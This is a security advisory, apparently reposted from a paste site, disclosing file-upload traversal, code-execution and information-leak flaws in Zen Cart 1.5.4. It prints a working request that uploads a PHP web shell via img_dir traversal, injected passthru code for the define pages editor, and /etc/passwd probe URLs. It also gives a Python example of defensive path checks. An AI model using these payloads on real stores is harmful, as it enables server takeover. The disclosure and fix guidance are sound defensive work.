moften

Zen Cart 1.5.4 - Code Execution and Information Leak

Oct 6th, 2015
Zen Cart 1.5.4: Code Execution and Information Leak
Security Advisory – Curesec Research Team

1. Introduction

Affected Product: Zen Cart 1.5.4
Fixed in: partial fix via patch
Partial Patch Link:
https://www.zen-cart.com/showthread.php?218239-curesec-security-report-Patch-Included

Vendor Contact: security@zen-cart.com
Vulnerability Type: Code Execution and Information Leak
Remote Exploitable: Yes
Reported to vendor: 08/13/2015
Disclosed to public: 09/14/2015
Release mode: Coordinated release
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Vulnerability Description: Arbitrary File Upload

When uploading an image for a record, there is no check on the type or
extension of the file, with the single exception that it cannot be a
htaccess file. Uploaded files are stored in the /image directory, which
is protected from code execution by a htaccess file. That protection
only holds if the server actually honours htaccess files; it may be
configured not to (for example for speed or security reasons, via
AllowOverride None), in which case an uploaded PHP file in /image is
directly executable.

Independently of that, an attacker can perform a directory traversal via
the img_dir POST parameter to store an uploaded file outside of the
protected directory, thus gaining code execution or overwriting
sensitive files even if the image directory is protected by the htaccess
file.

The recommendations for denying code execution listed in the help page
"Important Site Security Recommendations" - such as protecting the
/image and /html_includes folders against file modification and
execution - do not protect against code execution via this attack,
because the file is written outside those folders.

The same problem exists in other admin scripts performing file
operations, such as media_manager.php, manufacturers.php,
attributes_controller.php, mail.php, new_product_preview.php,
record_company.php, product_types.php, and categories.php.

Please note that an admin account is required which has the right to
edit one of the items that provide an image upload, such as the right
"Catalog: Product Types" or "Extra: Record Artists".

3. Proof of Concept: Arbitrary File Upload

The request to upload a file may look like this:

POST /zen-cart-v1.5.4-12302014/admin2/record_artists.php?page=1&mID=1&action=save HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=--------1358192638

----------1358192638
Content-Disposition: form-data; name="securityToken"

30bb3768c3aa1120ccae02eca8ec8a4b
----------1358192638
Content-Disposition: form-data; name="artists_name"

The Russ Tippins Band
----------1358192638
Content-Disposition: form-data; name="artists_image"; filename="test.php"
Content-Type: application/x-php

<?php
passthru($_GET['x']);

----------1358192638
Content-Disposition: form-data; name="img_dir"

dvd/../../
----------1358192638
Content-Disposition: form-data; name="artists_url[1]"

www.russtippins.com/
----------1358192638
Content-Disposition: form-data; name="x"

37
----------1358192638
Content-Disposition: form-data; name="y"

9
----------1358192638--

The img_dir value dvd/../../ moves the destination out of the image
directory, so test.php is written to a location the htaccess rules do
not cover, and passthru($_GET['x']) can then be triggered by requesting
the uploaded file. The securityToken is the CSRF token of the
authenticated admin session, which is why an admin account is a
prerequisite.

  89.  
4. Further

Code Execution

With an admin account with the right "Tools: Define Pages Editor" it is
possible to edit a limited number of PHP files which mainly contain
HTML, here:
http://localhost/zen-cart-v1.5.4-12302014/admin2/define_pages_editor.php?define_it=4&action=new_page

Direct execution of these files is prohibited via htaccess files, so
with correct server configuration the intention seems to be that an
attacker should not be able to gain code execution via this editor.

However, the protection against code execution is insufficient: the
htaccess rules only block requests that address the files directly,
while any injected code is still executed once the file is included by
a page that is allowed to run. For example:

1. Visit
   http://localhost/zen-cart-v1.5.4-12302014/admin2/define_pages_editor.php?define_it=8&action=new_page
2. Add <?php passthru($_GET['e']); ?> to the page content and save.
3. Visit
   http://localhost/zen-cart-v1.5.4-12302014/index.php?main_page=nonexistent&cPath=2&e=ls%20-alF

Please note that if the user followed the guide "Important Site Security
Recommendations", they will have set these files to read-only, so the
editor cannot write the injected code and this attack fails.

Information Leak

Via a directory traversal in the products_image_large_additional
parameter, an attacker can check whether a file exists on the server,
thus gaining information about installed software. The page behaves
differently depending on whether the target exists: for an existing file
the traversal path is echoed into the img src attribute, for a missing
file the default image is shown instead. Viewing the file contents is
not possible.

Example:

http://localhost/zen-cart-v1.5.4-12302014/index.php?main_page=popup_image_additional&pID=26&pic=1&products_image_large_additional=../../../../../../../etc/passwd
results in
<a href="javascript:window.close()"><img
src="../../../../../../../etc/passwd"

http://localhost/zen-cart-v1.5.4-12302014/index.php?main_page=popup_image_additional&pID=26&pic=1&products_image_large_additional=../../../../../../../etc/passwd2
results in the default image being shown
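
The img_dir traversal on upload (sections 2 and 3) and the
products_image_large_additional traversal above share one root cause: an
attacker-controlled relative path is joined to the image directory
without confirming that the result stays inside it, and the upload
additionally has no extension allowlist. The following Python is an
added example of the server-side checks a fix needs; it is not Zen Cart
code (Zen Cart is PHP), and the image root, the allowed extensions and
the executable-extension deny list are assumed values chosen for the
illustration. It runs the advisory's own payloads through the checks.

```python
"""Path containment and extension checks for the two traversal flaws in
the Zen Cart 1.5.4 advisory. Added example, not Zen Cart code; paths and
extension lists below are assumptions."""
import posixpath

IMAGE_ROOT = "/var/www/zencart/images"               # assumed install path
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif", "webp"}   # assumed image allowlist
# Assumed deny list for any *inner* extension, e.g. "shell.php.jpg": Apache
# AddHandler matches every extension in a name, not only the last one.
EXEC_EXT = {"php", "phtml", "php3", "php4", "php5", "php7", "phps", "phar"}


def contained_path(root, relative):
    """Join `relative` under `root` lexically and return the normalized
    absolute path, or None if it would escape `root`.

    Absolute inputs and NUL bytes are rejected outright rather than
    "repaired", so img_dir=dvd/../../ is refused instead of being
    silently redirected somewhere else."""
    if not relative or "\x00" in relative or relative.startswith("/"):
        return None
    root = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root, relative))
    # commonpath is component-based: it equals root only when the
    # candidate is root itself or lies below it ("/images" vs "/imagesX"
    # do not collide the way a string prefix test would).
    if posixpath.commonpath([root, candidate]) != root:
        return None
    return candidate


def upload_target(img_dir, filename, root=IMAGE_ROOT):
    """Destination path for an uploaded image, or None if the request must
    be rejected. Both checks are the ones the advisory found missing: an
    extension allowlist (Zen Cart only blocks .htaccess) and directory
    containment for the attacker-controlled img_dir."""
    # The client-supplied filename must be a bare name, never a path.
    if ("\x00" in filename or filename != posixpath.basename(filename)
            or filename.startswith(".")):
        return None
    stem, dot, ext = filename.rpartition(".")
    if not dot or not stem or ext.lower() not in ALLOWED_EXT:
        return None
    if any(part.lower() in EXEC_EXT for part in stem.split(".")):
        return None
    # img_dir is optional (the root itself) but must stay under the root.
    directory = root if not img_dir else contained_path(root, img_dir)
    if directory is None:
        return None
    return posixpath.join(directory, filename)


def additional_image_path(value, root=IMAGE_ROOT):
    """Resolve products_image_large_additional, refusing anything outside
    the image root or without an image extension, so the existence check
    the real page performs afterwards can no longer be used as a
    file-existence oracle for /etc and friends."""
    path = contained_path(root, value)
    if path is None:
        return None
    return path if path.rpartition(".")[2].lower() in ALLOWED_EXT else None


def demo():
    """The advisory's own payloads plus benign requests, for inspection."""
    return {
        "poc_upload": upload_target("dvd/../../", "test.php"),
        "benign_upload": upload_target("dvd", "cover.jpg"),
        "double_ext_upload": upload_target("dvd", "cover.php.jpg"),
        "poc_leak": additional_image_path("../../../../../../../etc/passwd"),
        "benign_leak": additional_image_path("dvd/cover_large.jpg"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:>18}: {'rejected' if result is None else result}")
```

The check is lexical on purpose, so it runs offline; on a real file
system the final destination should additionally be passed through
realpath() before writing, because a symlink inside the image directory
can still point outside it. Neither check replaces the htaccess or
server-level rule that denies PHP execution in the upload directory; that
remains the second layer for the case where a future parameter is
forgotten.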
  132.  
5. Solution

To mitigate the information leak a patch can be used:
https://www.zen-cart.com/showthread.php?218239-curesec-security-report-Patch-Included

The Arbitrary File Upload vulnerability has not been fixed as of
disclosure.

6. Report Timeline

08/13/2015 Informed Vendor about Issue
09/12/2015 Vendor releases report and partial fix
09/14/2015 Disclosed to public

7. Blog Reference:
http://blog.curesec.com/article/blog/Zen-Cart-154-Code-Execution-and-Information-Leak-54.html